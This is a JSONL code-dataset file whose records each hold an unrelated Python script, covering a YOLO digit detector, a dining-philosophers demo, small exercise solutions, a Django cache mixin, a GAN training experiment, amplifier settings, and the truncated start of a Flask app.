+{"seq_id":"418216772","text":"import json\r\nimport cv2\r\nfrom yolo.backend.utils.box import draw_scaled_boxes\r\nimport os\r\nimport yolo\r\nfrom yolo.frontend import create_yolo\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom itertools import permutations\r\n\r\ndef detector(image_loc):\r\n # 1. create yolo instance\r\n yolo_detector = create_yolo(\"ResNet50\", [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"], 416)\r\n \r\n # 2. load pretrained weighted file\r\n DEFAULT_WEIGHT_FILE = os.path.join(yolo.PROJECT_ROOT, \"weights.h5\")\r\n yolo_detector.load_weights(DEFAULT_WEIGHT_FILE)\r\n \r\n # 3. Load images\r\n DEFAULT_IMAGE_FOLDER = \"Machine_Learning\\\\imgs\"\r\n\r\n img_files = [os.path.join(DEFAULT_IMAGE_FOLDER, image_loc)]\r\n print(img_files)\r\n imgs = []\r\n for fname in img_files:\r\n img = cv2.imread(fname)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n imgs.append(img)\r\n #plt.imshow(img)\r\n #plt.show()\r\n \r\n # 4. Predict digit region\r\n THRESHOLD = 0.3\r\n for img in imgs:\r\n boxes, probs = yolo_detector.predict(img, THRESHOLD)\r\n \r\n return probs\r\n\r\ndef first_nonzero(arr, axis, invalid_val=-1):\r\n mask = arr!=0\r\n return np.where(mask.any(axis=axis), mask.argmax(axis=axis), invalid_val)\r\ndef get_number(prob_buffer):\r\n if (len(prob_buffer)==0):\r\n return str(-1)\r\n output_vector = first_nonzero(prob_buffer,axis=1,invalid_val=-1)\r\n output = \"\"\r\n \r\n for val in output_vector:\r\n output += str(val)\r\n return output\r\n\r\ndef check_if_correct(answer_value, detect):\r\n if(detect=='-1'):\r\n return -1\r\n \r\n answer_len = len(answer_value)\r\n detection_len = len(detect)\r\n tracker = answer_len\r\n av_array = []\r\n detect_array = []\r\n \r\n for i in answer_value:\r\n av_array.append(int(i))\r\n\r\n for i in detect:\r\n detect_array.append(int(i))\r\n\r\n while tracker <= detection_len:\r\n perms = permutations(detect_array, tracker)\r\n for values in perms:\r\n if values == tuple(av_array):\r\n return int(answer_value)\r\n tracker += 1\r\n return int(detect)\r\n\r\n#print(\"This is answer(19):\",check_if_correct(\"19\",get_number(detector(\"answer_1.png\"))))","sub_path":"Machine_Learning/Machine_Learning.py","file_name":"Machine_Learning.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"625066854","text":"import time\nimport random\nfrom threading import Thread\n\nfilosofos = []\ngarfos = []\n\n\nclass Filosofo():\n def __init__(self, nome):\n self.nome = nome\n self.comendo = False\n self.comeu = False\n\n\ndef Comer(filosofo):\n inicio = time.time()\n\n filosofo.comendo = True\n SetGarfoEsquerdo(filosofo, True)\n SetGarfoDireito(filosofo, True)\n\n time.sleep(5)\n\n filosofo.comendo = False\n filosofo.comeu = True\n SetGarfoEsquerdo(filosofo, False)\n SetGarfoDireito(filosofo, False)\n fim = time.time()\n print(\"Quantum = \" ,fim - inicio)\n\n\ndef TodosJaComeram():\n for filosofo in filosofos:\n if not filosofo.comeu:\n return False\n return True\n\n\ndef NovaRodada():\n for filosofo in filosofos:\n filosofo.comeu =False\n\n\n\ndef Rodizio():#semaforo, seleciona o proximo e escalonamento pq ele vai escolher o prox\n\n if TodosJaComeram():#timesharing, ele so vai comer denovo quando todos os outros estiverem comidos\n NovaRodada();\n\n filosofo = random.choice(filosofos)\n\n\n if filosofo.comendo == False and filosofo.comeu == False:\n GarfoEsquerdo = GetGarfoEsquerdo(filosofo)\n GarfoDireito = GetGarfoDireito(filosofo)\n\n if not GarfoEsquerdo and not GarfoDireito: #dois garfos falsos = LIVRES\n Thread(target=Comer, args=(filosofo,)).start()\n\n\n time.sleep(.1)\n Rodizio()\n\n\ndef Tela():\n while True:\n\n print('')\n print('----------------------')\n print('')\n\n for filosofo in filosofos:\n\n if filosofo.comendo:\n estado = 'esta comendo'\n else:\n estado = ' '\n print(GetGarfoEsquerdo(filosofo),' ', filosofo.nome, estado )\n\n\n time.sleep(2)\n\n\n\ndef SetGarfoEsquerdo(filosofo, garfo):\n posicao = filosofos.index(filosofo)\n garfos[posicao] = garfo\n\n\ndef SetGarfoDireito(filosofo, garfo):\n posicao = filosofos.index(filosofo)\n if posicao == 4:\n garfos[0] = garfo\n else:\n garfos[posicao+1] = garfo\n\n\ndef GetGarfoEsquerdo(filosofo):\n posicao = filosofos.index(filosofo)\n return garfos[posicao]\n\ndef GetGarfoDireito(filosofo):\n posicao = filosofos.index(filosofo)\n if posicao == 4:\n return garfos[0]\n else:\n return garfos[posicao+1]\n\n\n\nif __name__ == '__main__':\n garfos.append(False)\n garfos.append(False)\n garfos.append(False)\n garfos.append(False)\n garfos.append(False)\n\n filosofos.append(Filosofo('Aristóteles'))\n filosofos.append(Filosofo('Descartes'))\n filosofos.append(Filosofo('Platão'))\n filosofos.append(Filosofo('Pitágoras'))\n filosofos.append(Filosofo('Euclides'))\n\n Thread(target=Tela, args=()).start() ##paralela\n Rodizio()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"541290776","text":"\ndef f(word):\n desired_length = 0\n desired_substring = ''\n # Insert your code here\n l=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n ll=[]\n for x in word:\n ll.append(x)\n n1=len(l)\n n2=len(ll)\n #print(ll)\n r=[]\n count=1\n for i in range(n2):\n for j in range(i,n2):\n for z in range(n1):\n if ll[i:j]==l[z:z+j-i]:\n r.append(j-i)\n \n desired_substring=max(r) \n\n print(f'The longest substring of consecutive letters has a length of {desired_length}.')\n print(f'The leftmost such substring is {desired_substring}.')\nf('xy')\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"9021 principle of programming/作业成绩/mid_term/z5143964.files/tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"543634893","text":"\"\"\"\nn이 백만이라 정렬 자체는 퀵소트 쓰면 1초 시간제한은 무난할 것 같음\n\"\"\"\n\nimport sys\nreadline = lambda: sys.stdin.readline().rstrip()\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def print(self):\n print('{x} {y}'.format(x=self.x, y=self.y))\n\n\nif __name__ == '__main__':\n N = int(readline())\n points = []\n for _ in range(N):\n x, y = map(int, readline().split())\n points.append(Point(x, y))\n \n sorted_points = sorted(points, key = lambda x: (x.x, x.y))\n for point in sorted_points:\n point.print()","sub_path":"baekjoonOJ/11650/11650.py","file_name":"11650.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"59675913","text":"from django.core.cache import caches\nfrom django.views.decorators.cache import (cache_page,\n\n)\nfrom django.views.decorators.vary import (vary_on_cookie,\n)\n\n\nclass CachPageVaryOnCookieMixin:\n \"\"\"mixin cahing a single page. Subclass can provide this attributes\n 'cach_name' - name of cache to use\n 'time' - cache timeout for this page. when not provided the default time out is used\"\"\"\n\n cache_name = 'default'\n\n @classmethod\n def get_timeout(cls):\n if hasattr(cls, 'timeout'):\n return cls.timeout\n cache = caches[cls.cache_name]\n return cache.default_timeout\n\n @classmethod\n def as_view(cls, *args, **kwargs):\n view = super().as_view(*args, **kwargs)\n view = vary_on_cookie(view)\n view = cache_page(\n timeout=cls.get_timeout(),\n cache=cls.cache_name,\n )(view)\n return view","sub_path":"core/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"262677049","text":"# Implements a Generative Adversarial Network, from\r\n# arxiv.org/abs/1406.2661\r\n# but, it always collapses to generating a single image.\r\n# Let me know if you can get it to work! - David Duvenaud\r\n\r\nfrom __future__ import absolute_import, division\r\nfrom __future__ import print_function\r\nimport autograd.numpy as np\r\nimport autograd.numpy.random as npr\r\nfrom autograd import multigrad\r\nfrom autograd.util import flatten\r\nimport matplotlib.pyplot as plt\r\nimport subprocess, os\r\nfrom mylib import util\r\n\r\n### Define geneerator, discriminator, and objective ###\r\n\r\ndef relu(x): return np.maximum(0, x)\r\ndef sigmoid(x): return 0.5 * (np.tanh(x) + 1.0)\r\ndef logsigmoid(x): return x - np.logaddexp(0, x)\r\ndef leaky_relu(x): return np.maximum(0, x) + np.minimum(0, x) * 0.001\r\n\r\ndef init_random_params(scale, layer_sizes, rs=npr.RandomState(0)):\r\n \"\"\"Build a list of (weights, biases) tuples,\r\n one for each layer in the net.\"\"\"\r\n return [(scale * rs.randn(m, n), # weight matrix\r\n scale * rs.randn(n)) # bias vector\r\n for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]\r\n\r\ndef batch_normalize(activations):\r\n mbmean = np.mean(activations, axis=0, keepdims=True)\r\n return (activations - mbmean) / (np.std(activations, axis=0, keepdims=True) + 1)\r\n\r\ndef neural_net_predict_gen(params, inputs):\r\n \"\"\"Params is a list of (weights, bias) tuples.\r\n inputs is an (N x D) matrix.\"\"\"\r\n inpW, inpb = params[0]\r\n inputs = leaky_relu(np.dot(inputs, inpW) + inpb)\r\n for W, b in params[1:-1]:\r\n outputs = np.dot(inputs, W) + b\r\n outputs = batch_normalize(np.dot(inputs, W) + b)\r\n inputs = leaky_relu(outputs)\r\n outW, outb = params[-1]\r\n outputs = np.dot(inputs, outW) + outb\r\n return outputs\r\n\r\ndef neural_net_predict_dsc(params, inputs):\r\n \"\"\"Params is a list of (weights, bias) tuples.\r\n inputs is an (N x D) matrix.\"\"\"\r\n inpW, inpb = params[0]\r\n inputs = relu(np.dot(inputs, inpW) + inpb)\r\n for W, b in params[1:-1]:\r\n outputs = np.dot(inputs, W) + b\r\n # outputs = batch_normalize(np.dot(inputs, W) + b)\r\n inputs = leaky_relu(outputs)\r\n # inputs = relu(outputs)\r\n outW, outb = params[-1]\r\n outputs = np.dot(inputs, outW) + outb\r\n return outputs\r\n\r\ndef generate_from_noise(gen_params, num_samples, noise_dimZ, rs):\r\n noise = rs.randn(num_samples, noise_dimZ)\r\n samples = neural_net_predict_gen(gen_params, noise)\r\n return sigmoid(samples)\r\n\r\ndef igp_hat(zs, noiseX):\r\n # noiseX is unit gaussian\r\n\r\n # true_means_0 = np.array([-1, 1, -1, 3, 4])\r\n # true_means_1 = np.array([1, -1, 2, 3, 0])\r\n\r\n true_means_0 = np.array([-50])\r\n true_means_1 = np.array([50])\r\n \r\n std = 1.00\r\n # differs in last column, is 2 instead of 0.\r\n alt_means_1 = np.array([1, -1, 2, 3, 2])\r\n # xs = true_means_0 + zs * alt_means_1\r\n xs = (1-zs) * true_means_0 + zs * true_means_1\r\n # xs = np.minimum(6, xs)\r\n # xs = np.maximum(-6, xs)\r\n xs = xs + std*noiseX\r\n # xs = xs + np.random.normal(0, std, xs.shape)\r\n return xs \r\n\r\ndef gan_objective(gen_params, dsc_params, real_data, num_samples, noise_dimZ, noise_dimX, rs):\r\n fake_z = generate_from_noise(gen_params, num_samples, noise_dimZ, rs)\r\n noiseX = rs.randn(num_samples, noise_dimX)\r\n fake_data = igp_hat(fake_z, noiseX)\r\n # fake_data = fake_z\r\n assert fake_data.shape == real_data.shape\r\n logprobs_fake = logsigmoid(neural_net_predict_dsc(dsc_params, fake_data))\r\n logprobs_real = logsigmoid(neural_net_predict_dsc(dsc_params, real_data))\r\n # import code; code.interact(local=dict(globals(), **locals()))\r\n return np.mean(logprobs_real) - np.mean(logprobs_fake)\r\n\r\ndef entropy_objective(gen_params, batch_size, noise_dimZ, rs, neighbors_function):\r\n # try to maximize entropy\r\n fake_z = generate_from_noise(gen_params, batch_size, noise_dimZ, rs)\r\n\r\n neighbors = neighbors_function(fake_z)\r\n\r\n entropy_loss = 0\r\n for i in range(len(fake_z)):\r\n sq_dist = 0\r\n if i == neighbors[i][0] or i == neighbors[i][1]:\r\n continue\r\n left_dist = fake_z[i] - fake_z[neighbors[i][0]]\r\n right_dist = fake_z[neighbors[i][1]] - fake_z[i]\r\n assert left_dist >= 0 and right_dist >= 0, 'not sorted'\r\n left_dist = max(1e-5, left_dist)\r\n right_dist = max(1e-5, right_dist)\r\n sq_dist += 0.5 * np.log(left_dist) + 0.5 * np.log(right_dist)\r\n entropy_loss += -sq_dist\r\n return entropy_loss / len(fake_z - 1)\r\n\r\ndef alphabetize(num):\r\n assert num < 26**3, 'num bigger than 17576'\r\n mapper = {0: 'a', 1: 'b', 2: 'c', 3: 'd', 4: 'e', 5: 'f', 6: 'g', 7: 'h', 8: 'i', 9: 'j', 10: 'k', 11: 'l', 12: 'm', 13: 'n', 14: 'o', 15: 'p', 16: 'q', 17: 'r', 18: 's', 19: 't', 20: 'u', 21: 'v', 22: 'w', 23: 'x', 24: 'y', 25: 'z'}\r\n hundreds = int(num / (26*26)) % 26\r\n tens = int(num / 26) % 26\r\n ones = num % 26\r\n return ''.join([mapper[hundreds], mapper[tens], mapper[ones]])\r\n\r\ndef save_images(fake_z, fake_data, real_data, out_dir, nm, dsc_params, vmin=0, vmax=1):\r\n # plot Z\r\n assert not np.isnan(fake_z).any(), 'NaN in fake_z'\r\n rmax = int( max(1, max(fake_z)) )\r\n rmin = int( min(0, min(fake_z)))\r\n binsize = (int(rmax) - int(rmin)) / 100\r\n plt.hist(fake_z, bins = np.arange(rmin, rmax, binsize))\r\n plt.ylabel('Histogram counts', color = 'b')\r\n plt.xlim([rmin, rmax])\r\n plt.title('Generated Z')\r\n plt.savefig(out_dir + 'gan_samples_Z_' + nm + '.png')\r\n plt.close()\r\n\r\n\r\n rmax = max(max(real_data), max(fake_data))\r\n rmin = min(min(real_data), min(fake_data))\r\n binsize = (rmax - rmin) / 100\r\n # plot X\r\n query_pts = np.arange(rmin, rmax, binsize)\r\n curr_dsc = sigmoid(neural_net_predict_dsc(dsc_params, query_pts.reshape(len(query_pts), 1)))\r\n fig, ax1 = plt.subplots()\r\n ax1.hist(fake_data, bins = np.arange(rmin, rmax, binsize),\r\n color = 'b',\r\n alpha = 0.5)\r\n ax1.hist(real_data, bins = np.arange(rmin, rmax, binsize), \r\n color = 'g', \r\n alpha = 0.5)\r\n ax1.set_ylabel('Histogram counts', color = 'b')\r\n ax1.tick_params('y', colors = 'b')\r\n ax1.set_xlim(rmin, rmax)\r\n ax2 = ax1.twinx()\r\n ax2.plot(np.arange(rmin, rmax, binsize), curr_dsc, 'r')\r\n ax2.set_ylabel('Discriminator label | 0=real ; 1=fake', \r\n color = 'r')\r\n ax2.set_ylim(0, 1)\r\n ax2.tick_params('y', colors = 'r')\r\n fig.tight_layout()\r\n plt.title('Generated X')\r\n plt.savefig(out_dir + 'gan_samples_X_' + nm + '.png')\r\n plt.close()\r\n return\r\n\r\n### Define minimax version of adam optimizer ###\r\n\r\ndef adam_minimax(grad_both, init_params_max, init_params_min, neighbors_function, callback=None, num_iters=100,\r\n step_size_max=0.001, step_size_min=0.001, b1=0.9, b2=0.999, eps=10**-8):\r\n \"\"\"Adam modified to do minimiax optimization, for instance to help with\r\n training generative adversarial networks.\"\"\"\r\n\r\n def exponential_decay(step_size_min, step_size_max):\r\n if step_size_min > 0.0001:\r\n step_size_min *= 0.99\r\n if step_size_max > 0.001:\r\n step_size_max *= 0.99\r\n return step_size_min, step_size_max\r\n\r\n x_max, unflatten_max = flatten(init_params_max)\r\n x_min, unflatten_min = flatten(init_params_min)\r\n\r\n m_max = np.zeros(len(x_max))\r\n v_max = np.zeros(len(x_max))\r\n m_min = np.zeros(len(x_min))\r\n v_min = np.zeros(len(x_min))\r\n\r\n K = 1\r\n\r\n for i in range(num_iters):\r\n g_max_uf, g_min_uf = grad_both(unflatten_max(x_max),\r\n unflatten_min(x_min), i, neighbors_function)\r\n g_max, _ = flatten(g_max_uf)\r\n g_min, _ = flatten(g_min_uf)\r\n\r\n if callback: \r\n callback(unflatten_max(x_max), \r\n unflatten_min(x_min), \r\n i, \r\n unflatten_max(g_max), \r\n unflatten_min(g_min))\r\n\r\n step_size_min, step_size_max = exponential_decay(step_size_min, step_size_max)\r\n\r\n # Update generator (maximizer)\r\n m_max = (1 - b1) * g_max + b1 * m_max # First moment estimate.\r\n v_max = (1 - b2) * (g_max**2) + b2 * v_max # Second moment estimate.\r\n mhat_max = m_max / (1 - b1**(i + 1)) # Bias correction.\r\n vhat_max = v_max / (1 - b2**(i + 1))\r\n x_max = x_max + step_size_max * mhat_max / (np.sqrt(vhat_max) + eps)\r\n\r\n # Update discriminator (minimizer)\r\n m_min = (1 - b1) * g_min + b1 * m_min # First moment estimate.\r\n v_min = (1 - b2) * (g_min**2) + b2 * v_min # Second moment estimate.\r\n mhat_min = m_min / (1 - b1**(i + 1)) # Bias correction.\r\n vhat_min = v_min / (1 - b2**(i + 1))\r\n x_min = x_min - step_size_min * mhat_min / (np.sqrt(vhat_min) + eps)\r\n\r\n for k in range(K-1):\r\n g_max_uf, g_min_uf = grad_both(unflatten_max(x_max),\r\n unflatten_min(x_min), i, neighbors_function)\r\n g_min, _ = flatten(g_min_uf)\r\n\r\n # Update discriminator (minimizer)\r\n m_min = (1 - b1) * g_min + b1 * m_min # First moment estimate.\r\n v_min = (1 - b2) * (g_min**2) + b2 * v_min # Second moment estimate.\r\n mhat_min = m_min / (1 - b1**(i + 1)) # Bias correction.\r\n vhat_min = v_min / (1 - b2**(i + 1))\r\n x_min = x_min - step_size_min * mhat_min / (np.sqrt(vhat_min) + eps)\r\n\r\n return unflatten_max(x_max), unflatten_min(x_min)\r\n\r\n\r\ndef create_gif(out_dir):\r\n print('Creating GIF...')\r\n subprocess.call('convert -delay 15 -loop 0 ' + out_dir + '*_X_*.png ' + out_dir + '_anim_X.gif', shell = True)\r\n subprocess.call('convert -delay 15 -loop 0 ' + out_dir + '*_Z_*.png ' + out_dir + '_anim_Z.gif', shell = True)\r\n print('Done.')\r\n return\r\n\r\ndef count_num_folders(out_dir):\r\n for fold in os.listdir(out_dir):\r\n assert os.path.isdir(out_dir + fold), 'Not a folder!'\r\n return len(os.listdir(out_dir))\r\n \r\ndef copy_script(out_dir):\r\n src_dir = '/cluster/mshen/prj/gans/src/'\r\n script_nm = __file__\r\n subprocess.call('cp ' + src_dir + script_nm + ' ' + out_dir, shell = True)\r\n return\r\n\r\ndef save_gen_params(gen_params, gp_out_dir, nm):\r\n np.savetxt(gp_out_dir + nm + '_00.csv', gen_params[0][0], delimiter = ',')\r\n np.savetxt(gp_out_dir + nm + '_01.csv', gen_params[0][1], delimiter = ',')\r\n np.savetxt(gp_out_dir + nm + '_10.csv', gen_params[1][0], delimiter = ',')\r\n np.savetxt(gp_out_dir + nm + '_11.csv', gen_params[1][1], delimiter = ',')\r\n return\r\n\r\n### Setup and run ###\r\n\r\nif __name__ == '__main__':\r\n out_place = '/cluster/mshen/prj/gans/out/2017-06-19/c_gan/'\r\n num_folds = count_num_folders(out_place)\r\n out_dir = out_place + alphabetize(num_folds + 1) + '/'\r\n util.ensure_dir_exists(out_dir)\r\n gen_params_out_dir = out_dir + 'gen_params/'\r\n util.ensure_dir_exists(gen_params_out_dir)\r\n print('outdir: ' + alphabetize(num_folds + 1))\r\n\r\n copy_script(out_dir)\r\n counter = 0\r\n\r\n # Model hyper-parameters\r\n noise_dimZ = 1\r\n noise_dimX = 1\r\n gen_layer_sizes = [noise_dimZ, 16, 1]\r\n dsc_layer_sizes = [1, 16, 16, 1]\r\n\r\n # Training parameters\r\n gen_param_scale = 0.1 # generate diverse samples\r\n dsc_param_scale = 0.1 # ensure 50/50 prior\r\n # batch_size = 10000\r\n batch_size = 200\r\n num_epochs = 100\r\n step_size_max = 0.10\r\n # step_size_max = 0.005\r\n step_size_min = 0.001\r\n\r\n\r\n print(\"Loading training data...\")\r\n train_data = np.loadtxt('/cluster/mshen/prj/gans/out/2017-06-19/a_generate/gaussian_noisy/X.csv', delimiter = ',')\r\n train_data = train_data.reshape(len(train_data), 1)\r\n\r\n # train_data = np.loadtxt('/cluster/mshen/prj/gans/out/2017-06-19/a_generate/X.csv', delimiter = ',')\r\n # train_data = train_data.reshape(len(train_data), 1)\r\n\r\n init_gen_params = init_random_params(gen_param_scale, gen_layer_sizes)\r\n init_dsc_params = init_random_params(dsc_param_scale, dsc_layer_sizes)\r\n\r\n num_batches = int(np.ceil(len(train_data) / batch_size))\r\n def batch_indices(iter):\r\n idx = iter % num_batches\r\n return slice(idx * batch_size, (idx+1) * batch_size)\r\n\r\n def neighbors_function(data):\r\n data = list(data)\r\n sorteddata = sorted(data) # fast: 0.1 seconds or less\r\n ns = []\r\n # print('Constructing neighbors...')\r\n # timer = util.Timer(total = len(data))\r\n for i, d in enumerate(data):\r\n if sorteddata.index(d) > 0:\r\n n1 = data.index( sorteddata[ sorteddata.index(d) - 1 ] )\r\n else:\r\n n1 = data.index( d )\r\n try:\r\n n2 = data.index( sorteddata[ sorteddata.index(d) + 1 ] )\r\n except IndexError:\r\n n2 = data.index(d)\r\n ns.append( np.array([n1, n2]) )\r\n # timer.update()\r\n # print('Done with neighbors')\r\n return np.array(ns) \r\n\r\n # Define training objective\r\n seed = npr.RandomState(1)\r\n def objective(gen_params, dsc_params, iter, neighbors_function):\r\n idx = batch_indices(iter)\r\n c1, c2 = c1c2_schedule(iter)\r\n return c1 * gan_objective(gen_params, dsc_params, \r\n train_data[idx], \r\n batch_size, \r\n noise_dimZ,\r\n noise_dimX, \r\n seed) - \\\r\n c2 * entropy_objective(gen_params, \r\n batch_size, \r\n noise_dimZ, \r\n seed, \r\n neighbors_function)\r\n\r\n def c1c2_schedule(iter):\r\n if iter < 50:\r\n return 0, 1\r\n else:\r\n return 1, 0.2\r\n return c1, c2\r\n\r\n # Get gradients of objective using autograd.\r\n both_objective_grad = multigrad(objective, argnums=[0,1])\r\n\r\n print(\" Epoch | Objective | Fake probability | Real Probability \")\r\n def print_perf(gen_params, dsc_params, iter, gen_gradient, dsc_gradient):\r\n if iter % 10 == 0:\r\n ability = np.mean(objective(gen_params, dsc_params, iter, neighbors_function))\r\n \r\n fake_z = generate_from_noise(gen_params, 10000, noise_dimZ, seed)\r\n noiseX = seed.randn(10000, noise_dimX)\r\n fake_data = igp_hat(fake_z, noiseX)\r\n \r\n # fake_data = fake_z\r\n \r\n real_data = train_data\r\n probs_fake = np.mean(sigmoid(neural_net_predict_dsc(dsc_params, fake_data)))\r\n probs_real = np.mean(sigmoid(neural_net_predict_dsc(dsc_params, real_data)))\r\n print(\"{:15}|{:20}|{:20}|{:20}\".format(iter//num_batches, ability, probs_fake, probs_real))\r\n save_images(fake_z, fake_data, real_data, out_dir, alphabetize(int(iter/10)), dsc_params, vmin=0, vmax=1)\r\n save_gen_params(gen_params, gen_params_out_dir, alphabetize(int(iter/10)) )\r\n return ability\r\n return None\r\n\r\n # The optimizers provided can optimize lists, tuples, or dicts of parameters.\r\n optimized_params = adam_minimax(both_objective_grad,\r\n init_gen_params, init_dsc_params, neighbors_function, \r\n step_size_max=step_size_max, step_size_min=step_size_min,\r\n num_iters=num_epochs * num_batches, callback=print_perf)\r\n\r\n print('Done')\r\n create_gif(out_dir)\r\n # import code; code.interact(local=dict(globals(), **locals()))","sub_path":"src/c_gan_gaussian.py","file_name":"c_gan_gaussian.py","file_ext":"py","file_size_in_byte":14819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"36802296","text":"import numpy as np\n##############################################################\n## Describe source\n\n\"\"\"Signal\"\"\" \nN_sig = 400\nP_sig_dBm = 0 # dBm\nP_sig = np.power(10,-(30-P_sig_dBm)/10) # W \nP_sig_ch = P_sig/N_sig\nWL_sig_start = 1528.38 #nm\nWL_sig_stop = 1567.95 #nm\n\nWL_sig = np.linspace(WL_sig_start, WL_sig_stop, N_sig)\nSignalf = P_sig/N_sig * np.full((N_sig,1), 1)\nSignalb = P_sig/N_sig * np.full((N_sig,1), 0)\n\n\"\"\"Pump\"\"\" \nN_pump = 1\n#P_pump multiple values for multiple values\nP_pump = {\"pump1\": 500e-3,\"pump2\": 1000e-3,\"pump3\": 500e-3}\n#P_pump = 500e-3 # W \nWL_pump = np.linspace(974, 974, N_pump)\n# Pumpf = P_pump/N_pump * np.full((N_pump,1), 0)\n# Pumpb = P_pump/N_pump * np.full((N_pump,1), 0)\nPumpf = 0/N_pump * np.full((N_pump,1), 0)\nPumpb = 0/N_pump * np.full((N_pump,1), 0)\n\n\"\"\"ASE\"\"\" \nN_ase = 401\nP_ase = 0e-8 # W \nWL_ase = np.linspace(1500, 1650, N_ase)\nASEf = P_ase/N_ase * np.full((N_ase,1), 1)\nASEb = P_ase/N_ase * np.full((N_ase,1), 1)\n\nWL = np.concatenate((WL_sig, WL_pump, WL_ase), axis=0) # duplicate power array to account for backward propagating power10\nPower = np.concatenate((Signalf, Pumpf, ASEf), axis=0) \n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\"\" Constants \"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nNS = 20 # Number of sections considered\n#Len and Temp_sim multiple values for multiple edfs\nedf_properties = {\"EDF1\":{\"Len\":10.6, \"Temp_sim\":65},\"EDF2\":{\"Len\":3.4, \"Temp_sim\":65},\"EDF3\":{\"Len\":6.25, \"Temp_sim\":65},\"EDF4\":{\"Len\":5.2, \"Temp_sim\":65}}\n# Len = 12 # EDF length in meters\n# Temp_sim = 22\n","sub_path":"Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"245441912","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nsys模块主要是跟python解释器打交道\n'''\n\n'''\nimport sys\n\nprint(sys.argv) #获取命令行参数,第一个参数就是程序本身\n\n#sys.exit() #退出程序,正常退出时:sys.exit(0)\n\nprint(sys.version) #获取python解释器版本\n\nprint(sys.path) #返回模块的搜索路径(python环境变量)\n\nprint(sys.platform) #操作系统平台名称\n\n#sys.stdin #输入\n#sys.stdout #输出\n#sys.stderr #错误\n'''\n\n#百分比进度显示\nimport sys\nimport time\n\ndef view_bar(num,total):\n rate = num/total\n rate_num = int(rate*100)\n r = '\\r%s%%' % (rate_num,) #\\r回到行的首位\n sys.stdout.write(r)\n sys.stdout.flush()\n\nif __name__ == '__main__':\n for i in range(101):\n time.sleep(0.1)\n view_bar(i,100)","sub_path":"day06/3-模块:sys.py","file_name":"3-模块:sys.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"355948387","text":"from flask import Flask, jsonify, request,render_template\nfrom flask_material import Material\nimport numpy as np\nfrom sklearn.externals import joblib\nimport pickle\nimport pandas as pd\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.externals import joblib\nfrom scipy.sparse import hstack\nfrom bs4 import BeautifulSoup\nimport re\nimport string\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\n# https://www.tutorialspoint.com/flask\nimport flask\napp = Flask(__name__) #Flask constructor takes the name of current_Module\nMaterial(app)\n\n\n###################################################\ndef decontracted(phrase):\n # specific\n phrase = re.sub(r\"won't\", \"will not\", phrase)\n phrase = re.sub(r\"can\\'t\", \"can not\", phrase)\n\n # general\n phrase = re.sub(r\"n\\'t\", \" not\", phrase)\n phrase = re.sub(r\"\\'re\", \" are\", phrase)\n phrase = re.sub(r\"\\'s\", \" is\", phrase)\n phrase = re.sub(r\"\\'d\", \" would\", phrase)\n phrase = re.sub(r\"\\'ll\", \" will\", phrase)\n phrase = re.sub(r\"\\'t\", \" not\", phrase)\n phrase = re.sub(r\"\\'ve\", \" have\", phrase)\n phrase = re.sub(r\"\\'m\", \" am\", phrase)\n return phrase\n\n\nstopwords= set(['br', 'the', 'i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you', \"you're\", \"you've\",\\\n \"you'll\", \"you'd\", 'your', 'yours', 'yourself', 'yourselves', 'he', 'him', 'his', 'himself', \\\n 'she', \"she's\", 'her', 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them', 'their',\\\n 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this', 'that', \"that'll\", 'these', 'those', \\\n 'am', 'is', 'are', 'was', 'were', 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does', \\\n 'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because', 'as', 'until', 'while', 'of', \\\n 'at', 'by', 'for', 'with', 'about', 'against', 'between', 'into', 'through', 'during', 'before', 'after',\\\n 'above', 'below', 'to', 'from', 'up', 'down', 'in', 'out', 'on', 'off', 'over', 'under', 'again', 'further',\\\n 'then', 'once', 'here', 'there', 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few', 'more',\\\n 'most', 'other', 